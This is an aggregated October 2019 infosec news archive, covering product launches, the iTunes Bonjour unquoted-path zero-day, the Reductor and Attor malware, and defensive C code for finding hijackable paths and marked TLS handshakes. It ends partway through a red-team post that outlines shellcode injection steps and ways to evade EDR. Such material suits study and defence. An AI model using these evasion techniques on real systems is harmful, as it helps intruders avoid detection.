Daily Archives: October 10, 2019

New infosec products of the week: October 11, 2019

FireEye Digital Threat Monitoring: Visibility beyond your walls FireEye Digital Threat Monitoring automatically collects and analyzes content on the dark and open web, alerting defenders whenever a potential threat is detected. By exposing threats early, organizations can more effectively identify breaches, exposures, and digital threats before they escalate – without adding operational complexity for the current security team. FileCloud launches Smart DLP, a real-time data leak prevention solution FileCloud Smart DLP is an intelligent, rule-driven … More

The post New infosec products of the week: October 11, 2019 appeared first on Help Net Security.

11 steps organizations should take to improve their incident response strategy

As the year draws to a close, it is time for businesses across all industries and sectors to reflect and prepare for the upcoming new year. With this in mind, FIRST has produced 11 vital steps that organizations should take to improve their incident response strategy. It is highly likely that an organization will face a cybersecurity incident of some sort at some point in its lifetime, regardless of the level of cybersecurity defense in … More

The post 11 steps organizations should take to improve their incident response strategy appeared first on Help Net Security.

ICS cybersecurity investment should be a priority in protecting operations from disruption

93% of ICS security professionals are concerned about cyberattacks causing operational shutdown or customer-impacting downtime, according to a Tripwire survey. In an effort to prepare against such threats, 77% have made ICS cybersecurity investments over the past two years, but 50% still feel that current investments are not enough. The survey was conducted by Dimensional Research and its respondents included 263 ICS security professionals at energy, manufacturing, chemical, dam, nuclear, water, food, automotive and transportation … More

The post ICS cybersecurity investment should be a priority in protecting operations from disruption appeared first on Help Net Security.

New method validates the integrity of computer chips using x-rays

Guaranteeing that computer chips, which can consist of billions of interconnected transistors, are manufactured without defects is a challenge. But how can one determine whether a chip has been compromised? Now a technique co-developed by researchers at the Paul Scherrer Institut in Switzerland and researchers at the USC Viterbi School of Engineering would allow companies and other organizations to non-destructively scan chips to ensure that they haven’t been altered and that they are manufactured to design specifications … More

The post New method validates the integrity of computer chips using x-rays appeared first on Help Net Security.

5G is here, now what?

5G is being positioned as a “network of networks” that will encompass public and private components, licensed and unlicensed spectrum, and even expand beyond cellular, to satellite communications. But in reality, 5G will only be one component of the enterprise vertical technology stack, states ABI Research. “The telco industry has somewhat designed 5G as a technology that will complement, or even replace, several other competing communication technologies. This is, in fact, built into the standard: … More

The post 5G is here, now what? appeared first on Help Net Security.

Okta SecurityInsights enables large enterprises to take action across their orgs to improve security

Okta, the leading independent provider of identity for the enterprise, announced Okta SecurityInsights, a family of product innovations that provides global organizations with personalized security detection and remediation capabilities at the end user, administrator, and customer network level. Okta is introducing two features of SecurityInsights: UserInsight, suspicious activity reporting for end users, and HealthInsight, customized, dynamic security best practice recommendations for administrators. These end user and administrator functionalities build on Okta’s investments in ThreatInsight, network … More

The post Okta SecurityInsights enables large enterprises to take action across their orgs to improve security appeared first on Help Net Security.

Hacking Is Not a Crime! Additional Thoughts from DEFCON 2019

In my previous post, I spoke about all of the different DEFCON villages where attendees can learn about and purchase all sorts of fun hacking/counter hacking tools. Even so, I covered only a small fraction of the activities at the conference. For example, attendees have the opportunity to participate in a lot of contests run […]… Read More

The post Hacking Is Not a Crime! Additional Thoughts from DEFCON 2019 appeared first on The State of Security.

IAR Systems launches new version of its security development tool C-Trust™

IAR Systems, the future-proof supplier of software tools and services for embedded development, has launched a new version of its security development tool C-Trust™. Version 1.30 adds a new Security Context Profile that automatically includes the configurations needed for basic device security and Intellectual Property (IP) protection. In addition, IAR Systems is very pleased to announce support for several devices from STMicroelectronics’ STM32F4 and L4 families, as well as NXP Semiconductors’ Kinetis K65 and K66 … More

The post IAR Systems launches new version of its security development tool C-Trust™ appeared first on Help Net Security.

CCC’s Digital Key Release 2.0 specification to be completed by end of 2019

The Car Connectivity Consortium (CCC) announced that its Digital Key Release 2.0 specification, which leverages Near Field Communication (NFC) technology to enable compatible mobile devices such as smartphones to securely access vehicles, is planned for completion by the end of 2019. Release 2.0 introduces a new scalable architecture to support mass adoption, while reducing development costs for adopters and ensuring interoperability between a variety of smart mobile devices and cars. In addition, the consortium has … More

The post CCC’s Digital Key Release 2.0 specification to be completed by end of 2019 appeared first on Help Net Security.

Rancher Labs’ Rancher 2.3 brings the benefits of Kubernetes to Windows apps

Rancher Labs, creators of the industry’s most widely adopted Kubernetes management platform, announced the general availability of Rancher 2.3. The latest release of their flagship product includes support for Windows containers, integration of Istio service mesh, and new cluster templates that provide enhanced security for large scale deployments of Kubernetes. These new capabilities strengthen Rancher’s Run Kubernetes Everywhere strategy by enabling an even broader range of enterprises to leverage the transformative power of Kubernetes. “Gartner … More

The post Rancher Labs’ Rancher 2.3 brings the benefits of Kubernetes to Windows apps appeared first on Help Net Security.

Sectigo partners with SPYRUS to help universities and enterprises protect against ransomware attacks

Sectigo, the world’s largest commercial Certificate Authority (CA) and a provider of purpose-built and automated PKI management solutions, announced a partnership with SPYRUS, a provider of cryptographic operating systems delivering the strongest protection for data in motion, at rest, and at work, to help universities and enterprises protect against ransomware attacks. By collaborating, Sectigo and SPYRUS ensure the confidentiality, integrity, and availability of sensitive data, enabling organizations to combat ransomware attacks. “It is increasingly important … More

The post Sectigo partners with SPYRUS to help universities and enterprises protect against ransomware attacks appeared first on Help Net Security.

With MSPAlliance membership, Portnox aims to strengthen cybersecurity for businesses

Portnox, a market leader for enterprise-grade wifi security, network visibility, access control and device risk management solutions, announced that it has joined MSPAlliance. With more than 30,000 cloud computing and managed service provider (MSP) corporate members, MSPAlliance has grown to become the largest industry association and certification body for cloud computing and managed service professionals. As a member of MSPAlliance, Portnox seeks to help MSPs deliver simplified enterprise-grade network security solutions to their clients in … More

The post With MSPAlliance membership, Portnox aims to strengthen cybersecurity for businesses appeared first on Help Net Security.

Integration Partners adds the ability to resell technologies available in Cloud Marketplaces

Integration Partners has added the ability to resell technologies available in the Amazon Web Services (AWS), Microsoft Azure, and Google Cloud Marketplaces. These technologies include workload and storage applications as well as security technologies. This newly added capability will enable Integration Partners’ customers to purchase and consume cloud-based technologies from one source. More importantly, customers with a multi-cloud strategy now have the flexibility to manage and deploy their licenses at any time without … More

The post Integration Partners adds the ability to resell technologies available in Cloud Marketplaces appeared first on Help Net Security.

OPSWAT joins the VMware Technology Alliance Partner program

OPSWAT, a leading critical infrastructure protection company, announced it has joined the VMware Technology Alliance Partner (TAP) program. OPSWAT has collaborated with VMware to better protect enterprises against cyber threats posed by both unmanaged (particularly BYOD) and managed devices, helping customers meet security policy mandates and avoid noncompliance fines. The integration aims to:

  • Enhance the VMware Unified Access Gateway and Horizon Client’s ability to assess devices for compliance violations and security issues
  • Prevent data losses through screen … More

The post OPSWAT joins the VMware Technology Alliance Partner program appeared first on Help Net Security.

Etisalat Digital productizes SonicWall technology in its “Business QuickStart” broadband bundle for SMBs

SonicWall announced that Etisalat Digital has productized SonicWall technology in its ‘Business QuickStart (BQS)’ broadband bundle for SMBs, offering telco-grade network security with a zero-touch installation feature. The industry pioneers’ combined efforts have resulted in protecting thousands of SMBs as they work to address the increasing demand for proven security solutions in the United Arab Emirates (UAE) and other regions supported by the Etisalat Group. “Security is no longer a luxury but a necessity that … More

The post Etisalat Digital productizes SonicWall technology in its “Business QuickStart” broadband bundle for SMBs appeared first on Help Net Security.

Trend Micro and Snyk provide open source vulnerability intelligence for DevOps

Trend Micro, the global leader in cloud security, announced a strategic partnership with Snyk, the leader in developer-first open source security. The partnership will focus on solving the unrelenting challenge that open source vulnerabilities create for developers, stemming from code-reuse, public repositories and open source. Together, Trend Micro and Snyk will help businesses manage the risk of vulnerabilities without interrupting the software delivery process. The combination of open source vulnerability intelligence from Snyk and Trend … More

The post Trend Micro and Snyk provide open source vulnerability intelligence for DevOps appeared first on Help Net Security.

Jeff Harrell joins Adaptiva as vice president of marketing

Adaptiva, a leading, global provider of endpoint management and security solutions for enterprise customers, announced that enterprise security veteran Jeff Harrell has joined the company as vice president of marketing. Harrell will use his more than 20 years of experience to oversee the marketing strategies and initiatives across a growing range of products designed to assist global enterprises with pressing endpoint management and security needs. “Jeff is known for his domain knowledge, creativity, and vision … More

The post Jeff Harrell joins Adaptiva as vice president of marketing appeared first on Help Net Security.

Fighting Human Nature: How to Combat Socially Engineered Account Takeover Attacks

Learn from a former U.S. cybercriminal why social engineering is one of the most difficult online crimes to stop.

As a fraud management leader, are you aware that social engineering is a widespread and increasingly common tactic used to take over customer accounts? Learn more about why social engineering is one of the most dangerous and difficult to stop online crimes.

Majority of Americans Fail Basic Cybersecurity Awareness

A newly released study from the Pew Research Center revealed most Americans are not aware of basic cybersecurity practices.

The study surveyed 4,272 American adults on a variety of technology-related issues and found that most of them struggled with basic cybersecurity concepts. Only 28 percent of respondents were familiar with two-factor authentication, and only 30 percent were aware that “https://” in a web address meant the connection was encrypted. Only 2 percent of those surveyed answered all ten questions correctly.

On privacy-related issues, the survey showed significant gaps in basic knowledge. Less than half of the subjects could correctly define privacy policies as “contracts between websites and users about how those sites will use their data,” and only 24 percent were aware that “private browsing” only hides online activities from other people using the same computer.

Adults with bachelor’s or advanced degrees tended to consistently score higher than those with high school educations or less. Respondents aged 18-29 also performed better than those above the age of 65, although the gap was smaller than that of the level of education achieved. 

The lack of awareness regarding https and two-factor authentication is perhaps most troubling, since there have been widespread efforts to encourage the use of https, and recently released data suggests that two-factor authentication blocks 99.9% of automated account-compromise attacks.

The findings of the study paint a bleak picture for cybersecurity in U.S. workplaces, where employee or contractor ignorance and negligence have consistently been one of the largest causes of data breaches for the last several years. 

See the Pew Research report here


The post Majority of Americans Fail Basic Cybersecurity Awareness appeared first on Adam Levin.

iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware

The gang behind the BitPaymer and iEncrypt ransomware has been found exploiting a zero-day in Apple’s iTunes and iCloud software for Windows.

The cybercriminals behind the BitPaymer and iEncrypt ransomware attacks have been exploiting, in the wild, a zero-day vulnerability in the Windows versions of Apple iTunes and iCloud.

The zero-day resides in the Bonjour updater that is packaged with Apple’s iTunes and iCloud software for Windows; the attackers used it to evade antivirus detection.

The evasion technique was discovered by researchers at Morphisec while observing an attack against an enterprise in the automotive industry.

“This time we have identified the abuse of an Apple zero-day vulnerability in the Bonjour updater that comes packaged with iTunes for Windows. The Windows exploit is important to note given Apple is sunsetting iTunes for Macs with the release of macOS Catalina this week, while Windows users will still need to rely on iTunes for the foreseeable future.” reads the security advisory published by Morphisec.
“The adversaries abused an unquoted path to maintain persistence and evade detection.”

The Bonjour updater runs in the background and automates multiple tasks, including downloading updates for Apple software. Experts pointed out that the Bonjour updater has its own entry in the installed software list and its own scheduled task to launch the process. This means that even uninstalling iTunes and iCloud doesn’t remove the Bonjour updater.

The experts discovered that the Bonjour updater was affected by an unquoted service path vulnerability.

Unquoted search paths are an old class of vulnerability: when the path to a service or program (commonly an uninstaller or updater) contains spaces and is not wrapped in quotes, Windows cannot tell where the executable name ends, so it tries the shorter space-delimited prefixes of the path first. An attacker who can write a file at one of those prefix locations gets it executed instead of the intended binary.

Bonjour was trying to run from the Program Files folder, but due to the unquoted path issue, it instead ran the BitPaymer ransomware that was named Program.

“Additionally, the malicious “Program” file doesn’t come with an extension such as “.exe“. This means it is likely that AV products will not scan the file since these products tend to scan only specific file extensions to limit the performance impact on the machine.” continues the analysis. “In this scenario, Bonjour was trying to run from the “Program Files” folder, but because of the unquoted path, it instead ran the BitPaymer ransomware since it was named “Program”. This is how the zero-day was able to evade detection and bypass AV.”


Experts explained that attackers who abuse a legitimate process signed by a trusted vendor, like Bonjour, can launch a malicious child process while evading detection. In this specific attack, security products did not scan the malicious payload because it had no file extension.

The unquoted service path vulnerability could also be exploited by attackers to escalate privileges: when the service runs as SYSTEM and a lower-privileged user can write to one of the prefix locations, the planted file runs with the service’s privileges.
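To make the search behaviour concrete, here is an added example (not code from the Morphisec report or from Security Affairs) that enumerates the file names an unquoted service or scheduled-task command line exposes, and shows that quoting the path closes the hole. The command lines are constructed, and the Bonjour-style path is assumed for illustration rather than taken from the report. For each space-delimited prefix the function lists the prefix as-is (the report’s extensionless “Program”) and, where the prefix has no extension, the “.exe” form that the CreateProcess documentation describes, so an audit catches either planting strategy.

```c
#include <stdio.h>
#include <string.h>

#define MAX_PATH_LEN 260   /* classic Windows MAX_PATH */
#define MAX_CANDIDATES 16

/* True when a service/task command line starts with an unquoted path that
   contains a space: the precondition for the hijack described above. */
int is_unquoted_with_spaces(const char *cmd) {
    return cmd[0] != '"' && strchr(cmd, ' ') != NULL;
}

/* Does the last path component carry an extension? CreateProcess only appends
   ".exe" to a name that has none. */
static int has_extension(const char *path) {
    const char *base = strrchr(path, '\\');
    base = base ? base + 1 : path;
    return strchr(base, '.') != NULL;
}

/* Enumerate the file names Windows may try, in order, for a command line.
   Quoted: exactly the quoted executable. Unquoted: every space-delimited prefix,
   as-is and (when it has no extension) with ".exe" appended. Every entry before
   the last one is a location an attacker can plant a file in. Returns the count. */
size_t hijack_candidates(const char *cmd, char out[][MAX_PATH_LEN], size_t max) {
    size_t n = 0;
    if (max == 0) return 0;
    if (cmd[0] == '"') {                               /* quoted: unambiguous */
        const char *end = strchr(cmd + 1, '"');
        size_t len = end ? (size_t)(end - cmd - 1) : strlen(cmd + 1);
        if (len >= MAX_PATH_LEN) len = MAX_PATH_LEN - 1;
        memcpy(out[0], cmd + 1, len);
        out[0][len] = '\0';
        return 1;
    }
    size_t total = strlen(cmd);
    for (size_t i = 0; i <= total && n < max; i++) {
        if (i != total && cmd[i] != ' ') continue;     /* prefix ends at a space or at the end */
        if (i >= MAX_PATH_LEN) break;
        memcpy(out[n], cmd, i);
        out[n][i] = '\0';
        n++;
        if (n < max && !has_extension(out[n - 1]) && i + 4 < MAX_PATH_LEN) {
            snprintf(out[n], MAX_PATH_LEN, "%s.exe", out[n - 1]);
            n++;
        }
    }
    return n;
}

int main(void) {
    /* Constructed sample "image paths": the vulnerable form and the fixed, quoted form. */
    const char *lines[] = {
        "C:\\Program Files\\Bonjour\\mDNSResponder.exe",
        "\"C:\\Program Files\\Bonjour\\mDNSResponder.exe\"",
    };
    char cand[MAX_CANDIDATES][MAX_PATH_LEN];
    for (size_t k = 0; k < 2; k++) {
        size_t n = hijack_candidates(lines[k], cand, MAX_CANDIDATES);
        printf("%s -> %s\n", lines[k], is_unquoted_with_spaces(lines[k]) ? "HIJACKABLE" : "ok");
        for (size_t i = 0; i < n; i++) printf("  try: %s\n", cand[i]);
    }
    return 0;
}
```

On a real host the input lines come from service image paths (`sc qc <name>`, or the PathName of Win32_Service) and from scheduled task actions; any line the function reports as hijackable, where a non-administrator can write to one of the listed prefix locations, is both a persistence hole and, if the service runs as SYSTEM, a privilege-escalation path.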

Morphisec Labs reported their discovery to Apple, which released iCloud for Windows 10.7, iCloud for Windows 7.14, and iTunes 12.10.1 for Windows to address the vulnerability.

Users who installed Apple software on a Windows computer and later uninstalled it should check whether the Bonjour updater is still present and, if so, manually remove it.

Pierluigi Paganini

(SecurityAffairs – iCloud, zero-day)

The post iTunes Zero-Day flaw exploited by the gang behind BitPaymer ransomware appeared first on Security Affairs.

New Reductor Nation-State Malware Compromises TLS

Kaspersky has a detailed blog post about a new piece of sophisticated malware that it's calling Reductor. The malware is able to compromise TLS traffic by patching the TLS engine on the infected computer on the fly, "marking" the infected host's TLS handshakes by subverting the underlying random-number generator, and adding new digital certificates. The result is that the attacker can identify, intercept, and decrypt TLS traffic from the infected computer.

The Kaspersky Attribution Engine shows strong code similarities between this family and the COMPfun Trojan. Moreover, further research showed that the original COMpfun Trojan most probably is used as a downloader in one of the distribution schemes. Based on these similarities, we're quite sure the new malware was developed by the COMPfun authors.

The COMpfun malware was initially documented by G-DATA in 2014. Although G-DATA didn't identify which actor was using this malware, Kaspersky tentatively linked it to the Turla APT, based on the victimology. Our telemetry indicates that the current campaign using Reductor started at the end of April 2019 and remained active at the time of writing (August 2019). We identified targets in Russia and Belarus.


Turla has in the past shown many innovative ways to accomplish its goals, such as using hijacked satellite infrastructure. This time, if we're right that Turla is the actor behind this new wave of attacks, then with Reductor it has implemented a very interesting way to mark a host's encrypted TLS traffic by patching the browser without parsing network packets. The victimology for this new campaign aligns with previous Turla interests.

We didn't observe any MitM functionality in the analyzed malware samples. However, Reductor is able to install digital certificates and mark the targets' TLS traffic. It uses infected installers for initial infection through HTTP downloads from warez websites. The fact the original files on these sites are not infected also points to evidence of subsequent traffic manipulation.

The attribution chain from Reductor to COMPfun to Turla is thin. Speculation is that the attacker behind all of this is Russia.
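As an added illustration of what “marking” a handshake looks like on the wire (this is example code, not Kaspersky’s or Reductor’s): the client random in a ClientHello is 32 bytes that an honest TLS stack draws fresh from its RNG for every connection, so the same prefix recurring across a host’s handshakes is the signature of a subverted generator. The block builds constructed ClientHello records, extracts the random from each, and flags the randoms that share a prefix. The 4-byte stamp and the prefix length are assumptions for the demo; the page does not specify Reductor’s actual marker layout.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define HELLO_LEN 52   /* size of the minimal ClientHello record built below */

/* Build a minimal ClientHello record (TLS 1.2 framing, one cipher suite, no
   extensions) around a 32-byte random. Constructed so the example runs offline. */
size_t build_client_hello(uint8_t out[HELLO_LEN], const uint8_t random[32]) {
    uint8_t *p = out;
    *p++ = 0x16; *p++ = 0x03; *p++ = 0x01;               /* record: handshake, legacy version */
    *p++ = 0x00; *p++ = 0x2F;                            /* record length = 47 */
    *p++ = 0x01; *p++ = 0x00; *p++ = 0x00; *p++ = 0x2B;  /* ClientHello, body length = 43 */
    *p++ = 0x03; *p++ = 0x03;                            /* client_version = TLS 1.2 */
    memcpy(p, random, 32); p += 32;                      /* client random */
    *p++ = 0x00;                                         /* session_id length = 0 */
    *p++ = 0x00; *p++ = 0x02; *p++ = 0x13; *p++ = 0x01;  /* cipher_suites: TLS_AES_128_GCM_SHA256 */
    *p++ = 0x01; *p++ = 0x00;                            /* compression_methods: null */
    *p++ = 0x00; *p++ = 0x00;                            /* extensions length = 0 */
    return (size_t)(p - out);
}

/* Copy the 32-byte client random out of a TLS record that carries a ClientHello.
   Returns 1 on success, 0 if the bytes are not a well-formed ClientHello record. */
int extract_client_random(const uint8_t *rec, size_t len, uint8_t out[32]) {
    if (len < 5 + 4 + 2 + 32) return 0;
    if (rec[0] != 0x16 || rec[1] != 0x03) return 0;       /* handshake record, SSL3/TLS major */
    size_t rec_len = ((size_t)rec[3] << 8) | rec[4];
    if (rec_len + 5 > len) return 0;                      /* truncated record */
    const uint8_t *hs = rec + 5;
    if (hs[0] != 0x01) return 0;                          /* not a ClientHello */
    size_t hs_len = ((size_t)hs[1] << 16) | ((size_t)hs[2] << 8) | hs[3];
    if (hs_len + 4 > rec_len || hs_len < 2 + 32) return 0;
    memcpy(out, hs + 4 + 2, 32);                          /* skip the 2-byte client_version */
    return 1;
}

/* Flag each random whose first prefix_len bytes match another handshake's random.
   Two honest 32-byte randoms share a 4-byte prefix with probability 2^-32, so a
   repeat across one host's connections points at an RNG patched to stamp a fixed
   identifier into the handshake. Returns the number of flagged randoms. */
size_t flag_shared_prefixes(const uint8_t (*randoms)[32], size_t n, size_t prefix_len, int *flagged) {
    size_t hits = 0;
    for (size_t i = 0; i < n; i++) {
        flagged[i] = 0;
        for (size_t j = 0; j < n; j++)
            if (i != j && memcmp(randoms[i], randoms[j], prefix_len) == 0) { flagged[i] = 1; break; }
        hits += (size_t)flagged[i];
    }
    return hits;
}

/* End-to-end run on constructed traffic: three handshakes from one host, two of
   which carry the same 4-byte stamp. Returns how many were flagged (2). */
size_t demo_flag_count(void) {
    static const uint8_t stamp[4] = { 0xA1, 0xB2, 0xC3, 0xD4 };  /* constructed marker, not Reductor's */
    uint8_t randoms[3][32];
    for (size_t i = 0; i < 3; i++)
        for (size_t b = 0; b < 32; b++)
            randoms[i][b] = (uint8_t)(0x11 * (i + 1) + 7 * b);   /* stand-in for real entropy */
    memcpy(randoms[0], stamp, 4);                                 /* "marked" handshakes */
    memcpy(randoms[1], stamp, 4);
    uint8_t wire[3][HELLO_LEN], seen[3][32];
    int flagged[3];
    for (size_t i = 0; i < 3; i++) {
        size_t len = build_client_hello(wire[i], randoms[i]);
        if (!extract_client_random(wire[i], len, seen[i])) return 0;
    }
    return flag_shared_prefixes(seen, 3, 4, flagged);
}

int main(void) {
    printf("marked handshakes: %zu of 3\n", demo_flag_count());
    return 0;
}
```

Against real captures the same two functions apply to the first record of each TCP flow to port 443; the prefix length and the grouping key (source host, process, or user) are tuning choices, and a prefix that repeats across many hosts is more likely a middlebox rewriting handshakes than an endpoint infection.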

How Cybercriminals Continue to Innovate

Europol Report: Ransomware, DDoS, Business Email Compromises Are Persistent Threats
Online attack threats continue to intensify, with criminals preferring ransomware, DDoS attacks and business email compromises, warns Europol, the EU's law enforcement intelligence agency. After numerous successful disruptions by police, criminals have responded by launching increasingly complex attacks.

Cisco Advances Communications Security with Completion of Automated Cryptographic Validation Protocol Testing

Today’s digital economy relies on secure communications in both our personal and business activities.  We expect that when private data is transmitted over the internet, or other communications channels, it will be protected against tampering and prying eyes.  The integrity and confidentiality of information is typically achieved using cryptography, mathematically based methods to encrypt and decrypt information.

We assume our communications are secure.  But are they?  Cryptography provides the foundation of secure communications, but how do we know that the cryptography we are using is correct and secure?  When was the last time you verified that the algorithms used have been implemented correctly?  Or that they have not been intentionally or unintentionally altered to make them less secure?

Fortunately for all of us, there are organizations that have active programs to do just this.  As highlighted in Anthony Grieco’s blog on “Automating Explicit Trust,” Cisco and industry leaders are working to develop technologies that provide explicit trust (i.e. evidence of trustworthiness) and enhance communications security.  A notable example is the Cryptographic Module Validation Program (CMVP), conducted by the National Institute of Standards and Technology (NIST), which validates cryptographic modules against the FIPS 140 Federal Information Processing Standard.  Many organizations are required to use only products that contain NIST-validated cryptographic modules.  And this makes sense.  Leaders want the communications used in their organizations to be based on a sound foundation that ensures the integrity and confidentiality of their information.

Historically, CMVP testing required significant manual effort, which made the endeavor both costly to vendors and extremely time consuming.  This forced vendors to make hard decisions about which products and software versions to validate.  The organizations requiring this validation saw the following:

  1. A smaller number of available validated products and software versions
  2. Having to choose between using a non-validated version of software that contains vulnerability fixes vs. using existing validated products with known vulnerabilities while waiting for the new software to be validated.

Recognizing the impact of this dilemma, NIST and industry have been working together to create the Automated Cryptographic Validation Testing (ACVT) program, a bold and visionary move that should increase the number of validated products, reduce the lag between a vulnerability fix and its validation, and reduce the risks inherent in manual operations.  This is made possible by the new Automated Cryptographic Validation Protocol (ACVP), which carries the communication between the product under test and the NIST test server.

The ACVT program is live and the NIST ACVT server is online.  Industry is actively incorporating ACVP into products.  Recently, Cisco successfully passed ACVT algorithm testing for one of its core cryptographic modules (validation # A4), formally validating the cryptography used to secure customer communications.

Network and system attacks by bad actors are frequently in the news.  It is encouraging to know there is now an industry-defined, independent third-party capability available and in use to validate the cryptography used to secure communications.  +1 for the good guys.

Visit the Trust Center to learn more about Cisco’s commitment to trustworthiness, transparency, and accountability.

Additional references:

Industry Working Group on Automated Cryptographic Algorithm Validation

NIST: Security Testing, Validation and Measurement

Attor malware was developed by one of the most sophisticated espionage groups

New espionage malware found targeting Russian-speaking users in Eastern Europe

ESET has found an advanced piece of malware named Attor that targets diplomats and high-profile Russian-speaking users in Eastern Europe.

ESET researchers discovered an advanced piece of malware named Attor that was used in cyberespionage operations against diplomats and high-profile Russian-speaking users in Eastern Europe.

Attor malware

Threat actors have been using Attor since 2013, yet the malicious code remained under the radar until last year.

The researchers believe that the threat actor behind Attor is a state-sponsored group involved in highly targeted attacks on selected victims.

“Attor’s espionage operation is highly targeted – we were able to trace Attor’s operation back to at least 2013, yet, we only identified a few dozen victims.” reads the analysis published by ESET.

“For example, in order to be able to report on the victim’s activities, Attor monitors active processes to take screenshots of selected applications. Only certain applications are targeted – those with specific substrings in the process name or window title.”

The researchers believe that the malware was developed specifically to infect Russian-speaking users: it targets popular Russian apps and services, including the social networks Odnoklassniki and VKontakte, the VoIP provider Multifon, the IM apps Qip and Infium, the search engine Rambler, the email clients Yandex and Mail.ru, and the payment system WebMoney.

The malware has a modular structure with a dispatcher and loadable plugins, all implemented as dynamic-link libraries (DLLs). The attackers first compromise the target and drop the components on disk, then load the dispatcher DLL.

The Attor malware makes sophisticated use of encryption to hide its components.

The plugins are delivered as DLLs asymmetrically encrypted with RSA and are recovered in memory using the public RSA key embedded in the dispatcher.

“In total, the infrastructure for C&C communication spans four Attor components – the dispatcher providing encryption functions, and three plugins implementing the FTP protocol, the Tor functionality and the actual network communication.” continues the analysis. “This mechanism makes it impossible to analyze Attor’s network communication unless all pieces of the puzzle have been collected. “

“We were able to recover eight of Attor’s plugins, some in multiple versions – we list them in Table 2. Assuming the numbering of plugins is continuous, and that actors behind Attor may use different sets of plugins on a per‑victim basis, we suspect there are even more plugins that have not yet been discovered. ” continues the analysis.

Analysis of the malware samples revealed an interesting module designed to detect when modems or older phones are connected to the infected machine. The malware is able to collect information about the files present on connected devices.

“The most curious plugin in Attor’s arsenal collects information about both connected modem/phone devices and connected storage drives, and about files present on these drives. It is responsible for collection of metadata, not the files themselves, so we consider it a plugin used for device fingerprinting, and hence likely used as a base for further data theft.” reads the report.

“While Attor’s functionality of fingerprinting storage drives is rather standard, its fingerprinting of GSM devices is unique.”

Attor’s device monitoring module implements a unique fingerprinting feature of GSM devices. Whenever a modem or a phone device is connected to a COM port, Device monitor uses AT commands to communicate with it.

ESET believes that the authors of the Attor malware developed this module to target users owning older mobile handsets, or even a custom GSM-capable platform.

“A more likely explanation of the plugin’s main motive is that it targets modems and older phones. Alternatively, it may be used to communicate with some specific devices (used by the victim or target organization) that are connected to the COM port or to the USB port using a USB-to-serial adaptor.” concludes the analysis. “In this scenario, it is possible the attackers have learned about the victim’s use of these devices using some other reconnaissance techniques.”

Pierluigi Paganini

(SecurityAffairs – Attor, malware)

The post Attor malware was developed by one of the most sophisticated espionage groups appeared first on Security Affairs.

Staying Hidden on the Endpoint: Evading Detection with Shellcode

True red team assessments require a secondary objective of avoiding detection. Part of the glory of a successful red team assessment is not getting detected by anything or anyone on the system. As modern Endpoint Detection and Response (EDR) products have matured over the years, red teams must follow suit. This blog post will provide some insights into how the FireEye Mandiant Red Team crafts payloads to bypass modern EDR products and get full command and control (C2) on their victims’ systems.

Shellcode injection or execution is our favorite method for launching a C2 payload on a victim system; but what is shellcode? Michael Sikorski defines shellcode as a “…term commonly used to describe any piece of self-contained executable code” (Practical Malware Analysis). Most penetration testing frameworks, such as Empire, Cobalt Strike, or Metasploit, have a shellcode generator built into the tool. The generator’s output is either raw binary or a hex-encoded byte array, depending on whether you generate it as raw output or as application source.

Why do we use shellcode for all our payloads?

The use of shellcode in our red team assessment payloads allows us to be incredibly flexible in the type of payload we use. Shellcode runners can be written in a wide range of programming languages that can be incorporated into many types of payloads. This flexibility allows us to customize our payloads to support the specific needs of our clients and of any given situation that may arise during a red team assessment. Since shellcode can be launched from inside a payload or injected into an already running process, we can use several techniques to increase the ability of our payloads to evade detection from EDR products depending on the scenario and technology in place in the target environment. Several techniques exist for obfuscating shellcode, such as encryption and custom encoding, that make it difficult for EDR products to detect shellcode from commercial C2 tools on its own. The flexibility and evasive properties of shellcode are the primary reason that we rely heavily on shellcode-based payloads during red team assessments.

Shellcode Injection Vs. Execution

One of the most crucial parts of any red team assessment is developing a payload that will successfully, reliably, and stealthily run on the target system. Payloads can either execute shellcode from within its own process or inject shellcode into the address space of another process that will ultimately execute the shellcode. For the purposes of this blog post we’ll refer to shellcode injection as shellcode executed inside a remote process and shellcode execution as shellcode executed inside the payload process.

Shellcode injection is one technique that red teams and malicious attackers use to avoid detection from EDR products and network defenders. Additionally, many EDR products implement detections based on the expected behavior of Windows processes. For example, an attacker that executes Mimikatz from the context of an arbitrary process, let’s say DefinitelyNotEvil.exe, may get detected or blocked outright because the EDR tool does not expect that process to access lsass.exe. However, by injecting into a Windows process, such as svchost.exe, that regularly touches lsass.exe, it may be possible to bypass these detections because the EDR product sees this as expected behavior.

In this blog post, we’ll cover three different techniques for running shellcode.

  • CreateThread
  • CreateRemoteThread
  • QueueUserAPC

Each of these techniques corresponds to a Windows API function that is responsible for the allocation of a thread to the shellcode, ultimately resulting in the shellcode being run. CreateThread is a technique used for shellcode execution while CreateRemoteThread and QueueUserAPC are forms of shellcode injection.

The following is a high-level outline of the process for running shellcode with each of the three different techniques.

CreateThread (shellcode execution in the current process):

  1. Allocate memory in the current process
  2. Copy shellcode into the allocated memory
  3. Modify the protections of the newly allocated memory to allow execution of code from within that memory space
  4. Create a thread with the base address of the allocated memory segment
  5. Wait on the thread handle to return

CreateRemoteThread (shellcode injection):

  1. Get the process ID of the process to inject into
  2. Open the target process
  3. Allocate executable memory within the target process
  4. Write shellcode into the allocated memory
  5. Create a thread in the remote process with the start address of the allocated memory segment

Figure 1: Windows API calls for CreateRemoteThread injection

QueueUserAPC (shellcode injection):

  1. Get the process ID of the process to inject into
  2. Open the target process
  3. Allocate memory within the target process
  4. Write shellcode into the allocated memory
  5. Modify the protections of the newly allocated memory to allow execution of code from within that memory space
  6. Open a thread in the remote process with the start address of the allocated memory segment
  7. Submit thread to queue for execution when it enters an “alertable” state
  8. Resume thread to enter “alertable” state

Figure 2: Windows API calls for QueueUserAPC injection

Command Execution

Let’s break down what we’ve talked about so far:

  • Malicious code is your shellcode – the stage 0 or stage 1 code that is truly going to do the malicious work.
  • Standard “shellcode runner” application which executes your code via either injection or execution. Most everyone writes their own shellcode runner, so we don’t necessarily deem this as true malware, the real malware is the shellcode itself.

Now that we’ve covered all that, we need a method to execute the code you compiled. Generally, this is either an executable (EXE) or a Dynamic Link Library (DLL). The Red Team prefers using Living Off the Land Binaries (lolbins) commands which will execute our compiled code.

The reason we can take advantage of lolbins is because of unmanaged exports. At a high level, when an executable calls a DLL it is looking for a specific export within the DLL to execute the code within that export. If the export is not properly protected, then you can craft your own DLL with the export name you know the executable is looking for and run your arbitrary code; which in this case will be your shellcode runner.

Putting It All Together

